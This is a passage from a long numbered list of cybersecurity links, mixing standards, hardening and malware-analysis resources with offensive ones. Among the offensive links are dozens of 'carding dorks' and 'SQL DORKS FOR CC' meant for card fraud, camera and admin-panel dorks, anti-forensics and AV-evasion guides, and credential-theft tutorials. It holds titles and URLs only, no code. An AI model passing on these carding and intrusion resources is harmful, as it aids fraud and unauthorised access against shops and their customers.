https://0x00sec.org/t/userland-api-monitoring-and-code-injection-detection/5565 -1187-Unpacking Redaman Malware & Basics of Self-Injection Packers: https://liveoverflow.com/unpacking-buhtrap-malware-basics-of-self-injection-packers-ft-oalabs-2/ -1188-Code injection on macOS: https://knight.sc/malware/2019/03/15/code-injection-on-macos.html -1189-(Shell)Code Injection In Linux Userland : https://blog.sektor7.net/#!res/2018/pure-in-memory-linux.md -1190-Code injection on Windows using Python: https://www.andreafortuna.org/2018/08/06/code-injection-on-windows-using-python-a-simple-example/ -1191-What is Reflective DLL Injection and how can be detected?: https://www.andreafortuna.org/cybersecurity/what-is-reflective-dll-injection-and-how-can-be-detected/ -1192-Windows Process Injection: https://modexp.wordpress.com/2018/08/23/process-injection-propagate/ -1193-A+ cheat sheet: https://www.slideshare.net/abnmi/a-cheat-sheet -1194-A Bettercap Tutorial — From Installation to Mischief: https://danielmiessler.com/study/bettercap/ -1195-Debugging Malware with WinDbg: https://www.ixiacom.com/company/blog/debugging-malware-windbg -1195-Malware analysis, my own list of tools and resources: https://www.andreafortuna.org/2016/08/05/malware-analysis-my-own-list-of-tools-and-resources/ -1196-Getting Started with Reverse Engineering: https://lospi.net/developing/software/.../assembly/2015/03/.../reversing-with-ida.html -1197-Debugging malicious windows scriptlets with Google chrome: https://medium.com/@0xamit/debugging-malicious-windows-scriptlets-with-google-chrome-c31ba409975c -1198-Intro to Radare2 for Malware Analysis: https://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/ -1199-Intro to Malware Analysis and Reverse Engineering: https://www.cybrary.it/course/malware-analysis/ -1200-Common Malware Persistence Mechanisms: https://resources.infosecinstitute.com/common-malware-persistence-mechanisms/ -1201-Finding Registry Malware Persistence with RECmd: https://digital-forensics.sans.org/blog/2019/05/07/malware-persistence-recmd -1202-Windows Malware Persistence Mechanisms : https://www.swordshield.com/blog/windows-malware-persistence-mechanisms/ -1203- persistence techniques: https://www.andreafortuna.org/2017/07/06/malware-persistence-techniques/ -1204- Persistence Mechanism - an overview | ScienceDirect Topics: https://www.sciencedirect.com/topics/computer-science/persistence-mechanism -1205-Malware analysis for Linux: https://www.sothis.tech/en/malware-analysis-for-linux-wirenet/ -1206-Linux Malware Persistence with Cron: https://www.sandflysecurity.com/blog/linux-malware-persistence-with-cron/ -1207-What is advanced persistent threat (APT)? : https://searchsecurity.techtarget.com/definition/advanced-persistent-threat-APT -1208-Malware Analysis, Part 1: Understanding Code Obfuscation : https://www.vadesecure.com/en/malware-analysis-understanding-code-obfuscation-techniques/ -1209-Top 6 Advanced Obfuscation Techniques: https://sensorstechforum.com/advanced-obfuscation-techniques-malware/ -1210-Malware Obfuscation Techniques: https://dl.acm.org/citation.cfm?id=1908903 -1211-How Hackers Hide Their Malware: Advanced Obfuscation: https://www.darkreading.com/attacks-breaches/how-hackers-hide-their-malware-advanced-obfuscation/a/d-id/1329723 -1212-Malware obfuscation techniques: four simple examples: https://www.andreafortuna.org/2016/10/13/malware-obfuscation-techniques-four-simple-examples/ -1213-Malware Monday: Obfuscation: https://medium.com/@bromiley/malware-monday-obfuscation-f65239146db0 -1213-Challenge of Malware Analysis: Malware obfuscation Techniques: https://www.ijiss.org/ijiss/index.php/ijiss/article/view/327 -1214-Static Malware Analysis - Infosec Resources: https://resources.infosecinstitute.com/malware-analysis-basics-static-analysis/ -1215-Malware Basic Static Analysis: https://medium.com/@jain.sm/malware-basic-static-analysis-cf19b4600725 -1216-Difference Between Static Malware Analysis and Dynamic Malware Analysis: http://www.differencebetween.net/technology/difference-between-static-malware-analysis-and-dynamic-malware-analysis/ -1217-What is Malware Analysis | Different Tools for Malware Analysis: https://blog.comodo.com/different-techniques-for-malware-analysis/ -1218-Detecting Malware Pre-execution with Static Analysis and Machine Learning: https://www.sentinelone.com/blog/detecting-malware-pre-execution-static-analysis-machine-learning/ -1219-Limits of Static Analysis for Malware Detection: https://ieeexplore.ieee.org/document/4413008 -1220-Kernel mode versus user mode: https://blog.codinghorror.com/understanding-user-and-kernel-mode/ -1221-Understanding the ELF: https://medium.com/@MrJamesFisher/understanding-the-elf-4bd60daac571 -1222-Windows Privilege Abuse: Auditing, Detection, and Defense: https://medium.com/palantir/windows-privilege-abuse-auditing-detection-and-defense-3078a403d74e -1223-First steps to volatile memory analysis: https://medium.com/@zemelusa/first-steps-to-volatile-memory-analysis-dcbd4d2d56a1 -1224-Maliciously Mobile: A Brief History of Mobile Malware: https://medium.com/threat-intel/mobile-malware-infosec-history-70f3fcaa61c8 -1225-Modern Binary Exploitation Writeups 0x01: https://medium.com/bugbountywriteup/binary-exploitation-5fe810db3ed4 -1226-Exploit Development 01 — Terminology: https://medium.com/@MKahsari/exploit-development-01-terminology-db8c19db80d5 -1227-Zero-day exploits: A cheat sheet for professionals: https://www.techrepublic.com/article/zero-day-exploits-the-smart-persons-guide/ -1228-Best google hacking list on the net: https://pastebin.com/x5LVJu9T -1229-Google Hacking: https://pastebin.com/6nsVK5Xi -1230-OSCP links: https://pastebin.com/AiYV80uQ -1231-Pentesting 1 Information gathering: https://pastebin.com/qLitw9eT -1232-OSCP-Survival-Guide: https://pastebin.com/kdc6th08 -1233-Googledork: https://pastebin.com/qKwU37BK -1234-Exploit DB: https://pastebin.com/De4DNNKK -1235-Dorks: https://pastebin.com/cfVcqknA -1236-GOOGLE HACKİNG DATABASE: https://pastebin.com/1ndqG7aq -1237-Carding Dorks 2019: https://pastebin.com/Hqsxu6Nn -1238-17k Carding Dorks 2019: https://pastebin.com/fgdZxy74 -1239-CARDING DORKS 2019: https://pastebin.com/Y7KvzZqg -1240-sqli dork 2019: https://pastebin.com/8gdeLYvU -1241-Private Carding Dorks 2018: https://pastebin.com/F0KxkMMD -1242-20K dorks list fresh full carding 2018: https://pastebin.com/LgCh0NRJ -1243-8k Carding Dorks :): https://pastebin.com/2bjBPiEm -1244-8500 SQL DORKS: https://pastebin.com/yeREBFzp -1245-REAL CARDING DORKS: https://pastebin.com/0kMhA0Gb -1246-15k btc dorks: https://pastebin.com/zbbBXSfG -1247-Sqli dorks 2016-2017: https://pastebin.com/7TQiMj3A -1248-Here is kind of a tutorial on how to write google dorks.: https://pastebin.com/hZCXrAFK -1249-10k Private Fortnite Dorks: https://pastebin.com/SF9UmG1Y -1250-find login panel dorks: https://pastebin.com/9FGUPqZc -1251-Shell dorks: https://pastebin.com/iZBFQ5yp -1252-HQ PAID GAMING DORKS: https://pastebin.com/vNYnyW09 -1253-10K HQ Shopping DORKS: https://pastebin.com/HTP6rAt4 -1254-Exploit Dorks for Joomla,FCK and others 2015 Old but gold: https://pastebin.com/ttxAJbdW -1255-Gain access to unsecured IP cameras with these Google dorks: https://pastebin.com/93aPbwwE -1256-new fresh dorks: https://pastebin.com/ZjdxBbNB -1257-SQL DORKS FOR CC: https://pastebin.com/ZQTHwk2S -1258-Wordpress uploadify Dorks Priv8: https://pastebin.com/XAGmHVUr -1259-650 DORKS CC: https://pastebin.com/xZHARTyz -1260-3k Dorks Shopping: https://pastebin.com/e1XiNa8M -1261-DORKS 2018 : https://pastebin.com/YAZkPJ0j -1262-HQ FORTNITE DORKS LIST: https://pastebin.com/rzhiNad8 -1263-HQ PAID DORKS MIXED GAMING LOL STEAM ..MUSIC SHOPING: https://pastebin.com/VwVpAvj2 -1264-Camera dorks: https://pastebin.com/fsARft2j -1265-Admin Login Dorks: https://pastebin.com/HWWNZCph -1266-sql gov dorks: https://pastebin.com/C8wqyNW8 -1267-10k hq gaming dorks: https://pastebin.com/cDLN8edi -1268-HQ SQLI Google Dorks For Shops/Amazon! Enjoy! : https://pastebin.com/y59kK2h0 -1269-Dorks: https://pastebin.com/PKvZYMAa -1270-10k btc dorks: https://pastebin.com/vRnxvbCu -1271-7,000 Dorks for hacking into various sites: https://pastebin.com/n8JVQv3X -1272-List of information gathering search engines/tools etc: https://pastebin.com/GTX9X5tF -1273-FBOSINT: https://pastebin.com/5KqnFS0B -1274-Ultimate Penetration Testing: https://pastebin.com/4EEeEnXe -1275-massive list of information gathering search engines/tools : https://pastebin.com/GZ9TVxzh -1276-CEH Class: https://pastebin.com/JZdCHrN4 -1277-CEH/CHFI Bundle Study Group Sessions: https://pastebin.com/XTwksPK7 -1278-OSINT - Financial: https://pastebin.com/LtxkUi0Y -1279-Most Important Security Tools and Resources: https://pastebin.com/cGE8rG04 -1280-OSINT resources from inteltechniques.com: https://pastebin.com/Zbdz7wit -1281-Red Team Tips: https://pastebin.com/AZDBAr1m -1282-OSCP Notes by Ash: https://pastebin.com/wFWx3a7U -1283-OSCP Prep: https://pastebin.com/98JG5f2v -1284-OSCP Review/Cheat Sheet: https://pastebin.com/JMMM7t4f -1285-OSCP Prep class: https://pastebin.com/s59GPJrr -1286-Complete Anti-Forensics Guide: https://pastebin.com/6V6wZK0i -1287-The Linux Command Line Cheat Sheet: https://pastebin.com/PUtWDKX5 -1288-Command-Line Log Analysis: https://pastebin.com/WEDwpcz9 -1289-An A-Z Index of the Apple macOS command line (OS X): https://pastebin.com/RmPLQA5f -1290-San Diego Exploit Development 2018: https://pastebin.com/VfwhT8Yd -1291-Windows Exploit Development Megaprimer: https://pastebin.com/DvdEW4Az -1292-Some Free Reverse engineering resources: https://pastebin.com/si2ThQPP -1293-Sans: https://pastebin.com/MKiSnjLm -1294-Metasploit Next Level: https://pastebin.com/0jC1BUiv -1295-Just playing around....: https://pastebin.com/gHXPzf6B -1296-Red Team Course: https://pastebin.com/YUYSXNpG -1297-New Exploit Development 2018: https://pastebin.com/xaRxgYqQ -1298-Good reviews of CTP/OSCE (in no particular order):: https://pastebin.com/RSPbatip -1299-Vulnerability Research Engineering Bookmarks Collection v1.0: https://pastebin.com/8mUhjGSU -1300-Professional-hacker's Pastebin : https://pastebin.com/u/Professional-hacker -1301-Google Cheat Sheet: http://www.googleguide.com/print/adv_op_ref.pdf -1302-Shodan for penetration testers: https://www.defcon.org/images/defcon-18/dc-18-presentations/Schearer/DEFCON-18-Schearer-SHODAN.pdf -1303-Linux networking tools: https://gist.github.com/miglen/70765e663c48ae0544da08c07006791f -1304-DNS spoofing with NetHunter: https://cyberarms.wordpress.com/category/nethunter-tutorial/ -1305-Tips on writing a penetration testing report: https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343 -1306-Technical penetration report sample: https://tbgsecurity.com/wordpress/wp-content/uploads/2016/11/Sample-Penetration-Test-Report.pdf -1307-Nessus sample reports: https://www.tenable.com/products/nessus/sample-reports -1308-Sample penetration testing report: https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf -1309-jonh-the-ripper-cheat-sheet: https://countuponsecurity.com/2015/06/14/jonh-the-ripper-cheat-sheet/ -1310-ultimate guide to cracking foreign character passwords using hashcat: http://www.netmux.com/blog/ultimate-guide-to-cracking-foreign-character-passwords-using-has -1311-Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III: https://www.unix-ninja.com/p/Building_a_Password_Cracking_Rig_for_Hashcat_-_Part_III -1312-cracking story how i cracked over 122 million sha1 and md5 hashed passwords: http://blog.thireus.com/cracking-story-how-i-cracked-over-122-million-sha1-and-md5-hashed-passwords/ -1313-CSA (Cloud Security Alliance) Security White Papers: https://cloudsecurityalliance.org/download/ -1314-NIST Security Considerations in the System Development Life Cycle: https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-64r2.pdf -1315-ISO 29100 information technology security techniques privacy framework: https://www.iso.org/standard/45123.html -1316-NIST National Checklist Program: https://nvd.nist.gov/ncp/repository -1317-OWASP Guide to Cryptography: https://www.owasp.org/index.php/Guide_to_Cryptography -1318-NVD (National Vulnerability Database): https://nvd.nist.gov/ -1319-CVE details: https://cvedetails.com/ -1320-CIS Cybersecurity Tools: https://www.cisecurity.org/cybersecurity-tools/ -1321-Security aspects of virtualization by ENISA: https://www.enisa.europa.eu/publications/security-aspects-of-virtualization/ -1322-CIS Benchmarks also provides a security guide for VMware, Docker, and Kubernetes: https://www.cisecurity.org/cis-benchmarks/ -1323-OpenStack's hardening of the virtualization layer provides a secure guide to building the virtualization layer: https://docs.openstack.org/security-guide/compute/hardening-the-virtualization-layers.html -1324-Docker security: https://docs.docker.com/engine/security/security/ -1325-Microsoft Security Development Lifecycle: http://www.microsoft.com/en-us/SDL/ -1326-OWASP SAMM Project: https://www.owasp.org/index.php/OWASP_SAMM_Project -1327-CWE/SANS Top 25 Most Dangerous Software Errors: https://cwe.mitre.org/top25/ -1329-OWASP Vulnerable Web Applications Directory Project: https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project -1330-CERT Secure Coding Standards: https://wiki.sei.cmu.edu/confluence/display/seccode/SEI+CERT+Coding+Standards -1331-NIST Special Publication 800-53: https://nvd.nist.gov/800-53 -1332-SAFECode Security White Papers: https://safecode.org/publications/ -1333-Microsoft Threat Modeling tool 2016: https://aka.ms/tmt2016/ -1334-Apache Metron for real-time big data security: http://metron.apache.org/documentation/ -1335-Introducing OCTAVE Allegro: Improving the Information Security Risk Assessment Process: https://resources.sei.cmu.edu/asset_files/TechnicalReport/2007_005_001_14885.pdf -1336-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems: http://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-18r1.pdf -1337-ITU-T X.805 (10/2003) Security architecture for systems providing end- to-end communications: https://www.itu.int/rec/dologin_pub.asp?lang=e&id=T-REC-X.805-200310-I!!PDF-E&type=items -1338-ETSI TS 102 165-1 V4.2.1 (2006-12) : Method and proforma for Threat, Risk, Vulnerability Analysis: http://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.01_60/ts_10216501v040201p.pdf -1339-SAFECode Fundamental Practices for Secure Software Development: https://safecode.org/wp-content/uploads/2018/03/SAFECode_Fundamental_Practices_for_Secure_Software_Development_March_2018.pdf -1340-NIST 800-64 Security Considerations in the System Development Life Cycle: https://csrc.nist.gov/publications/detail/sp/800-64/rev-2/final -1341-SANS A Security Checklist for Web Application Design: https://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389 -1342-Best Practices for implementing a Security Awareness Program: https://www.pcisecuritystandards.org/documents/PCI_DSS_V1.0_Best_Practices_for_Implementing_Security_Awareness_Program.pdf -1343-ETSI TS 102 165-1 V4.2.1 (2006-12): Method and proforma for Threat, Risk, Vulnerability Analysis: http://www.etsi.org/deliver/etsi_ts/102100_102199/10216501/04.02.03_60/ts_10216501v040203p.pdf -1344-NIST 800-18 Guide for Developing Security Plans for Federal Information Systems: https://csrc.nist.gov/publications/detail/sp/800-18/rev-1/final -1345-SafeCode Tactical Threat Modeling: https://safecode.org/safecodepublications/tactical-threat-modeling/ -1346-SANS Web Application Security Design Checklist: https://www.sans.org/reading-room/whitepapers/securecode/security-checklist-web-application-design-1389 -1347-Data Anonymization for production data dumps: https://github.com/sunitparekh/data-anonymization -1348-SANS Continuous Monitoring—What It Is, Why It Is Needed, and How to Use It: https://www.sans.org/reading-room/whitepapers/analyst/continuous-monitoring-is-needed-35030 -1349-Guide to Computer Security Log Management: https://ws680.nist.gov/publication/get_pdf.cfm?pub_id=50881 -1350-Malware Indicators: https://github.com/citizenlab/malware-indicators -1351-OSINT Threat Feeds: https://www.circl.lu/doc/misp/feed-osint/ -1352-SANS How to Use Threat Intelligence effectively: https://www.sans.org/reading-room/whitepapers/analyst/threat-intelligence-is-effectively-37282 -1353-NIST 800-150 Guide to Cyber Threat Information Sharing: https://nvlpubs.nist.gov/nistpubs/specialpublications/nist.sp.800-150.pdf -1354-Securing Web Application Technologies Checklist: https://software-security.sans.org/resources/swat -1355-Firmware Security Training: https://github.com/advanced-threat-research/firmware-security-training -1356-Burp Suite Bootcamp: https://pastebin.com/5sG7Rpg5 -1357-Web app hacking: https://pastebin.com/ANsw7WRx -1358-XSS Payload: https://pastebin.com/EdxzE4P1 -1359-XSS Filter Evasion Cheat Sheet: https://pastebin.com/bUutGfSy -1360-Persistence using RunOnceEx – Hidden from Autoruns.exe: https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/ -1361-Windows Operating System Archaeology: https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology -1362-How to Backdoor Windows 10 Using an Android Phone & USB Rubber Ducky: https://www.prodefence.org/how-to-backdoor-windows-10-using-an-android-phone-usb-rubber-ducky/ -1363-Malware Analysis using Osquery : https://hackernoon.com/malware-analysis-using-osquery-part-2-69f08ec2ecec -1364-Tales of a Blue Teamer: Detecting Powershell Empire shenanigans with Sysinternals : https://holdmybeersecurity.com/2019/02/27/sysinternals-for-windows-incident-response/ -1365-Userland registry hijacking: https://3gstudent.github.io/Userland-registry-hijacking/ -1366-Malware Hiding Techniques to Watch for: AlienVault Labs: https://www.alienvault.com/blogs/labs-research/malware-hiding-techniques-to-watch-for-alienvault-labs -1367- Full text of "Google hacking for penetration testers" : https://archive.org/stream/pdfy-TPtNL6_ERVnbod0r/Google+Hacking+-+For+Penetration+Tester_djvu.txt -1368- Full text of "Long, Johnny Google Hacking For Penetration Testers" : https://archive.org/stream/LongJohnnyGoogleHackingForPenetrationTesters/Long%2C%20Johnny%20-%20Google%20Hacking%20for%20Penetration%20Testers_djvu.txt -1369- Full text of "Coding For Penetration Testers" : https://archive.org/stream/CodingForPenetrationTesters/Coding%20for%20Penetration%20Testers_djvu.txt -1370- Full text of "Hacking For Dummies" : https://archive.org/stream/HackingForDummies/Hacking%20For%20Dummies_djvu.txt -1371-Full text of "Wiley. Hacking. 5th. Edition. Jan. 2016. ISBN. 1119154685. Profescience.blogspot.com" : https://archive.org/stream/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com/Wiley.Hacking.5th.Edition.Jan.2016.ISBN.1119154685.Profescience.blogspot.com_djvu.txt -1372- Full text of "Social Engineering The Art Of Human Hacking" : https://archive.org/stream/SocialEngineeringTheArtOfHumanHacking/Social%20Engineering%20-%20The%20Art%20of%20Human%20Hacking_djvu.txt -1373- Full text of "CYBER WARFARE" : https://archive.org/stream/CYBERWARFARE/CYBER%20WARFARE_djvu.txt -1374-Full text of "NSA DOCID: 4046925 Untangling The Web: A Guide To Internet Research" : https://archive.org/stream/Untangling_the_Web/Untangling_the_Web_djvu.txt -1375- Full text of "sectools" : https://archive.org/stream/sectools/hack-the-stack-network-security_djvu.txt -1376- Full text of "Aggressive network self-defense" : https://archive.org/stream/pdfy-YNtvDJueGZb1DCDA/Aggressive%20Network%20Self-Defense_djvu.txt -1377-Community Texts: https://archive.org/details/opensource?and%5B%5D=%28language%3Aeng+OR+language%3A%22English%22%29+AND+subject%3A%22google%22 -1378- Full text of "Cyber Spying - Tracking (sometimes).PDF (PDFy mirror)" : https://archive.org/stream/pdfy-5-Ln_yPZ22ondBJ8/Cyber%20Spying%20-%20Tracking%20%28sometimes%29_djvu.txt -1379- Full text of "Enzyclopedia Of Cybercrime" : https://archive.org/stream/EnzyclopediaOfCybercrime/Enzyclopedia%20Of%20Cybercrime_djvu.txt -1380- Full text of "Information Security Management Handbook" : https://archive.org/stream/InformationSecurityManagementHandbook/Information%20Security%20Management%20Handbook_djvu.txt -1381- Full text of "ARMArchitecture Reference Manual" : https://archive.org/stream/ARMArchitectureReferenceManual/DetectionOfIntrusionsAndMalwareAndVulnerabilityAssessment2016_djvu.txt -1382- Full text of "Metasploit The Penetration Tester S Guide" : https://archive.org/stream/MetasploitThePenetrationTesterSGuide/Metasploit-The+Penetration+Tester+s+Guide_djvu.txt -1383-Tips & tricks to master Google’s search engine: https://medium.com/infosec-adventures/google-hacking-39599373be7d -1384-Ethical Google Hacking - Sensitive Doc Dork (Part 2) : https://securing-the-stack.teachable.com/courses/ethical-google-hacking-1/lectures/3877866 -1385- Google Hacking Secrets:the Hidden Codes of Google : https://www.ma-no.org/en/security/google-hacking-secrets-the-hidden-codes-of-google -1386-google hacking: https://www.slideshare.net/SamNizam/3-google-hacking -1387-How Penetration Testers Use Google Hacking: https://www.cqure.nl/kennisplatform/how-penetration-testers-use-google-hacking -1388-Free Automated Malware Analysis Sandboxes and Services: https://zeltser.com/automated-malware-analysis/ -1389-How to get started with Malware Analysis and Reverse Engineering: https://0ffset.net/miscellaneous/how-to-get-started-with-malware-analysis/ -1390-Handy Tools And Websites For Malware Analysis: https://www.informationsecuritybuzz.com/articles/handy-tools-and-websites/ -1391-Dynamic Malware Analysis: https://prasannamundas.com/share/dynamic-malware-analysis/ -1392-Intro to Radare2 for Malware Analysis: https://malwology.com/2018/11/30/intro-to-radare2-for-malware-analysis/ -1393-Detecting malware through static and dynamic techniques: https://technical.nttsecurity.com/.../detecting-malware-through-static-and-dynamic-tec... -1394-Malware Analysis Tutorial : Tricks for Confusing Static Analysis Tools: https://www.prodefence.org/malware-analysis-tutorial-tricks-confusing-static-analysis-tools -1395-Malware Analysis Lab At Home In 5 Steps: https://ethicalhackingguru.com/malware-analysis-lab-at-home-in-5-steps/ -1396-Malware Forensics Guide - Static and Dynamic Approach: https://www.yeahhub.com/malware-forensics-guide-static-dynamic-approach/ -1397-Top 30 Bug Bounty Programs in 2019: https://www.guru99.com/bug-bounty-programs.html -1398-Introduction - Book of BugBounty Tips: https://gowsundar.gitbook.io/book-of-bugbounty-tips/ -1399-List of bug bounty writeups: https://pentester.land/list-of-bug-bounty-writeups.html -1400-Tips From A Bugbounty Hunter: https://www.secjuice.com/bugbounty-hunter/ -1401-Cross Site Scripting (XSS) - Book of BugBounty Tips: https://gowsundar.gitbook.io/book-of-bugbounty-tips/cross-site-scripting-xss -1402-BugBountyTips: https://null0xp.wordpress.com/tag/bugbountytips/ -1403-Xss Filter Bypass Payloads: www.oroazteca.net/mq67/xss-filter-bypass-payloads.html -1404-Bug Bounty Methodology: https://eforensicsmag.com/bug-bounty-methodology-ttp-tacticstechniques-and-procedures-v-2-0 -1405-GDB cheat-sheet for exploit development: www.mannulinux.org/2017/01/gdb-cheat-sheet-for-exploit-development.html -1406-A Study in Exploit Development - Part 1: Setup and Proof of Concept : https://www.anitian.com/a-study-in-exploit-development-part-1-setup-and-proof-of-concept -1407-Exploit development tutorial : https://www.computerweekly.com/tutorial/Exploit-development-tutorial-Part-Deux -1408-exploit code development: http://www.phreedom.org/presentations/exploit-code-development/exploit-code-development.pdf -1409-“Help Defeat Denial of Service Attacks: Step-by-Step”: http://www.sans.org/dosstep/ -1410-Internet Firewalls: Frequently Asked Questions: http://www.interhack.net/pubs/fwfaq/ -1411-Service Name and Transport Protocol Port Number: http://www.iana.org/assignments/port-numbers -1412-10 Useful Open Source Security Firewalls for Linux Systems: https://www.tecmint.com/open-source-security-firewalls-for-linux-systems/ -1413-40 Linux Server Hardening Security Tips: https://www.cyberciti.biz/tips/linux-security.html -1414-Linux hardening: A 15-step checklist for a secure Linux server : https://www.computerworld.com/.../linux-hardening-a-15-step-checklist-for-a-secure-linux-server -1415-25 Hardening Security Tips for Linux Servers: https://www.tecmint.com/linux-server-hardening-security-tips/ -1416-How to Harden Unix/Linux Systems & Close Security Gaps: https://www.beyondtrust.com/blog/entry/harden-unix-linux-systems-close-security-gaps -1417-34 Linux Server Security Tips & Checklists for Sysadmins: https://www.process.st/server-security/ -1418-Linux Hardening: https://www.slideshare.net/MichaelBoelen/linux-hardening -1419-23 Hardening Tips to Secure your Linux Server: https://www.rootusers.com/23-hardening-tips-to-secure-your-linux-server/ -1420-What is the Windows Registry? : https://www.computerhope.com/jargon/r/registry.htm -1421-Windows Registry, Everything You Need To Know: https://www.gammadyne.com/registry.htm -1422-Windows Registry Tutorial: https://www.akadia.com/services/windows_registry_tutorial.html -1423-5 Tools to Scan a Linux Server for Malware and Rootkits: https://www.tecmint.com/scan-linux-for-malware-and-rootkits/ -1424-Subdomain takeover dew to missconfigured project settings for Custom domain .: https://medium.com/bugbountywriteup/subdomain-takeover-dew-to-missconfigured-project-settings-for-custom-domain-46e90e702969 -1425-Massive Subdomains p0wned: https://medium.com/bugbountywriteup/massive-subdomains-p0wned-80374648336e -1426-Subdomain Takeover: Basics: https://0xpatrik.com/subdomain-takeover-basics/ -1427-Subdomain Takeover: Finding Candidates: https://0xpatrik.com/subdomain-takeover-candidates/ -1428-Bugcrowd's Domain & Subdomain Takeover!: https://bugbountypoc.com/bugcrowds-domain-takeover/ -1429-What Are Subdomain Takeovers, How to Test and Avoid Them?: https://dzone.com/articles/what-are-subdomain-takeovers-how-to-test-and-avoid -1430-Finding Candidates for Subdomain Takeovers: https://jarv.is/notes/finding-candidates-subdomain-takeovers/ -1431-Subdomain takeover of blog.snapchat.com: https://hackernoon.com/subdomain-takeover-of-blog-snapchat-com-60860de02fe7 -1432-Hostile Subdomain takeove: https://labs.detectify.com/tag/hostile-subdomain-takeover/ -1433-Microsoft Account Takeover Vulnerability Affecting 400 Million Users: https://www.safetydetective.com/blog/microsoft-outlook/ -1434-What is Subdomain Hijack/Takeover Vulnerability? How to Identify? & Exploit It?: https://blog.securitybreached.org/2017/10/11/what-is-subdomain-takeover-vulnerability/ -1435-Subdomain takeover detection with AQUATONE: https://michenriksen.com/blog/subdomain-takeover-detection-with-aquatone/ -1436-A hostile subdomain takeover! – Breaking application security: https://evilenigma.blog/2019/03/12/a-hostile-subdomain-takeover/ -1437-Web Development Reading List: https://www.smashingmagazine.com/2017/03/web-development-reading-list-172/ -1438-CSRF Attack can lead to Stored XSS: https://medium.com/bugbountywriteup/csrf-attack-can-lead-to-stored-xss-f40ba91f1e4f -1439-What is Mimikatz: The Beginner's Guide | Varonis: https://www.varonis.com/bog/what-is-mimikatz -1440-Preventing Mimikatz Attacks : https://medium.com/blue-team/preventing-mimikatz-attacks-ed283e7ebdd5 -1441-Mimikatz tutorial: How it hacks Windows passwords, credentials: https://searchsecurity.techtarget.com/.../Mimikatz-tutorial-How-it-hacks-Windows-passwords-credentials -1442-Mimikatz: Walkthrough [Updated 2019]: https://resources.infosecinstitute.com/mimikatz-walkthrough/ -1443-Mimikatz -Windows Tutorial for Beginner: https://hacknpentest.com/mimikatz-windows-tutorial-beginners-guide-part-1/ -1444-Mitigations against Mimikatz Style Attacks: https://isc.sans.edu/forums/diary/Mitigations+against+Mimikatz+Style+Attacks -1445-Exploring Mimikatz - Part 1 : https://blog.xpnsec.com/exploring-mimikatz-part-1/ -1446-Powershell AV Evasion. Running Mimikatz with PowerLine: https://jlajara.gitlab.io/posts/2019/01/27/Mimikatz-AV-Evasion.html -1447-How to Steal Windows Credentials with Mimikatz and Metasploit: https://www.hackingloops.com/mimikatz/ -1448-Retrieving NTLM Hashes without touching LSASS: https://www.andreafortuna.org/2018/03/26/retrieving-ntlm-hashes-without-touching-lsass-the-internal-monologue-attack/ -1449-From Responder to NT Authority\SYSTEM: https://medium.com/bugbountywriteup/from-responder-to-nt-authority-system-39abd3593319 -1450-Getting Creds via NTLMv2: https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html -1451-Living off the land: stealing NetNTLM hashes: https://www.securify.nl/blog/SFY20180501/living-off-the-land_-stealing-netntlm-hashes.html -1452-(How To) Using Responder to capture passwords on a Windows: www.securityflux.com/?p=303 -1453-Pwning with Responder - A Pentester's Guide: https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/ -1454-LLMNR and NBT-NS Poisoning Using Responder: https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/ -1455-Responder - Ultimate Guide : https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/guide/ -1456-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1457-LM, NTLM, Net-NTLMv2, oh my! : https://medium.com/@petergombos/lm-ntlm-net-ntlmv2-oh-my-a9b235c58ed4 -1458-SMB Relay Attack Tutorial: https://intrinium.com/smb-relay-attack-tutorial -1459-Cracking NTLMv2 responses captured using responder: https://zone13.io/post/cracking-ntlmv2-responses-captured-using-responder/ -1460-Skip Cracking Responder Hashes and Relay Them: https://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/ -1461-Metasploit's First Antivirus Evasion Modules: https://blog.rapid7.com/2018/10/09/introducing-metasploits-first-evasion-module/ -1462-Evading Anti-virus Part 1: Infecting EXEs with Shellter: https://www.hackingloops.com/evading-anti-virus-shellter/ -1463-Evading AV with Shellter: https://www.securityartwork.es/2018/11/02/evading-av-with-shellter-i-also-have-sysmon-and-wazuh-i/ -1464-Shellter-A Shellcode Injecting Tool : https://www.hackingarticles.in/shellter-a-shellcode-injecting-tool/ -1465-Bypassing antivirus programs using SHELLTER: https://myhackstuff.com/shellter-bypassing-antivirus-programs/ -1466-John the Ripper step-by-step tutorials for end-users : openwall.info/wiki/john/tutorials -1467-Beginners Guide for John the Ripper (Part 1): https://www.hackingarticles.in/beginner-guide-john-the-ripper-part-1/ -1468-John the Ripper Basics Tutorial: https://ultimatepeter.com/john-the-ripper-basics-tutorial/ -1469-Crack Windows password with john the ripper: https://www.securitynewspaper.com/2018/11/27/crack-windows-password-with-john-the-ripper/ -1470-Getting Started Cracking Password Hashes with John the Ripper : https://www.tunnelsup.com/getting-started-cracking-password-hashes/ -1471-Shell code exploit with Buffer overflow: https://medium.com/@jain.sm/shell-code-exploit-with-buffer-overflow-8d78cc11f89b -1472-Shellcoding for Linux and Windows Tutorial : www.vividmachines.com/shellcode/shellcode.html -1473-Buffer Overflow Practical Examples : https://0xrick.github.io/binary-exploitation/bof5/ -1474-Msfvenom shellcode analysis: https://snowscan.io/msfvenom-shellcode-analysis/ -1475-Process Continuation Shellcode: https://azeria-labs.com/process-continuation-shellcode/ -1476-Dynamic Shellcode Execution: https://www.countercept.com/blog/dynamic-shellcode-execution/ -1477-Tutorials: Writing shellcode to binary files: https://www.fuzzysecurity.com/tutorials/7.html -1478-Creating Shellcode for an Egg 